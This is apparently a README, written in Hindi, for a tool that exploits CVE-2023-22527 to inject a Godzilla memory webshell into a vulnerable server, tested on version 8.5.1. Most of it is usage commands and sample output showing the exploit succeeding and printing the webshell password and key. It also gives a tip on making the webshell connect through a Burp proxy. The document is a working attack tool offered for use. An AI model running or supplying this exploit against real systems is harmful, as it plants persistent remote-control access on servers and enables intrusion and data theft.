
CVE-2023-22527 मेमोरी शेल इंजेक्शन टूल
नोट: परीक्षण संस्करण 8.5.1 है, अन्य संस्करण भी काम करेंगे, लेकिन परीक्षण नहीं किया गया।
सामग्री Beichen द्वारा पिछले टूल से संदर्भित है।
java -jar CVE-2023-22527-Godzilla-MEMSHELL-main.jar url गॉडज़िला पासवर्ड गॉडज़िला कुंजी
उदाहरण
java -jar CVE-2023-22527-Godzilla-MEMSHELL-main.jar http://xxxx/ pass key
यदि मेमोरी शेल सफलतापूर्वक इंजेक्ट हो गया है लेकिन Godzilla कनेक्ट नहीं हो पा रहा है, तो कृपया अनुरोध कॉन्फ़िगरेशन में निम्नलिखित हेडर जोड़ें या Godzilla के लिए Burp प्रॉक्सी कॉन्फ़िगर करें।
Connection: close
$ java -jar .\CVE-2023-22527-Godzilla-MEMSHELL-main.jar http://127.0.0.1:8090/ qaxnb key
[*] Exploit url: http://127.0.0.1:8090/template/aui/text-inline.vm
Response Code: 200
Response Code: 200
[*] send payload
Validate Response Code: 200
[*] exploit success
[*] godzilla webshell password : qaxnb
[*] godzilla webshell key : key
